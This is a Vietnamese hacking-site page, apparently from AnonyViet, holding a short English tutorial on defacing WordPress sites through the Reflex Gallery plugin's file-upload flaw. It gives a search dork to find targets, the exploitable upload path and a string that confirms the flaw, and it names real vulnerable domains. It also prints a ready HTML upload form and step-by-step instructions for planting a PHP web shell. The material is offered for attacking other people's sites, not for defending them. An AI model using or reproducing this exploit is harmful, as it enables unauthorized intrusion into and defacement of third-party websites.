• Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

[DEFACE] How To Deface with WordPress Reflex Gallery

AnonyViet by AnonyViet
09/12/2015 - Updated on 16/12/2020
in Deface
Reading Time: 1 min read
A A
0

——————————————————————–
– Dork : inurl:/wp-content/plugins/reflex-gallery/
– Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
– Vuln : {“error”:”No files were uploaded.”}
– My Site Vuln : http://sjoyster.com/
– Script CSRF :
<html>
<title>Reflex-Gallery CSRF</title>
<form method=”POST” action=”http://straightlineinspection.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php” enctype=”multipart/form-data” >

<input type=”file” name=”qqfile”><br>

Các bài viết liên quan

web server hostvn script

Cách tạo Web Server trên VPS bằng Hostvn Script

12/08/2021
có nên sử dụng wordpress

Có nên sử dụng WordPress để thiết kế Website không?

24/07/2020
wordpress là gì

WordPress là gì? Các kiến thức WordPress cơ bản cho người mới bắt đầu

10/11/2019
Cách sử dụng Plugin Site Kit by Google trên WordPress 4

Cách sử dụng Plugin Site Kit by Google trên WordPress

03/11/2019

<input type=”submit” name=”Submit” value=”Pwn!”>

</form>
</html>
———————————————————————-

Okay Lets Go to Tutorial

– Save script CSRF [ reflex.html ] – Change The Site , to site Vuln
– Save
– Chek The Vuln
– Oh yeah , that vuln 😀
– Open The Script in the Browser
– Upload your shell
– bcc.php is my shell 🙂
– Click ” Pwn!”
– Succses 😀
– Open your Shell in the :
[ site.com/wp-content/uploads/shell.php

Tags: DefaceWordPress
Previous Post

[DEFACE] How To Deface with Formcraft

 Next Post

XSS Vulnerability
AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Khai thác lỗ hổng Wordpress Plugin WP-Dreamworkgallery 3
Deface

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

01/04/2017 - Updated on 16/12/2020
Hướng dẫn khai thác lỗi CMS Upload Website 2017 10
Basic Hacking

Hướng dẫn khai thác lỗi CMS Upload Website 2017

11/01/2017 - Updated on 16/12/2020
Khai thác lỗi Fcklinkgallery để Up file 10
Deface

Khai thác lỗi Fcklinkgallery để Up file

08/02/2016 - Updated on 16/12/2020
Dork Upload File FCKeditor [Update]
Deface

Dork Upload File FCKeditor [Update]

08/01/2016 - Updated on 16/12/2020
Hướng dẫn khai thác lỗi FCK trên Website 6
Deface

Hướng dẫn khai thác lỗi FCK trên Website

07/01/2016 - Updated on 16/12/2020
Admin Login Bypass [0day] 1
Deface

Admin Login Bypass [0day]

03/01/2016 - Updated on 16/12/2020
Next Post
XSS Vulnerability

XSS Vulnerability

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

0 Comments
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

TeraBox: Dịch vụ lưu trữ đám mây miễn phí 1TB 5

TeraBox: Dịch vụ lưu trữ đám mây miễn phí 1TB

25/09/2021
Tìm hiểu về cuộc chiến giữa các Hacker 6

Tìm hiểu về cuộc chiến giữa các Hacker

24/09/2021
Cách sử dụng Google Font trong Microsoft Word 7

Cách sử dụng Google Font trong Microsoft Word

24/09/2021
Top 7 trang web tốt nhất để học lập trình Web 8

Top 7 trang web tốt nhất để học lập trình Web

24/09/2021
autumn sale keysoff

Giá bản quyền Windows chỉ có 8.41$ nhân dịp Autumn Sale

24/09/2021

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

Bài viết mới

  • TeraBox: Dịch vụ lưu trữ đám mây miễn phí 1TB
  • Tìm hiểu về cuộc chiến giữa các Hacker
  • Cách sử dụng Google Font trong Microsoft Word
  • Top 7 trang web tốt nhất để học lập trình Web
  • Giá bản quyền Windows chỉ có 8.41$ nhân dịp Autumn Sale
  • Tại sao Telegram không an toàn như bạn nghĩ

©2021 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. iwin888 Gam Víp 88vin Twin 68 tải game iwin super win

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2021 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. iwin888 Gam Víp 88vin Twin 68 tải game iwin super win

wpDiscuz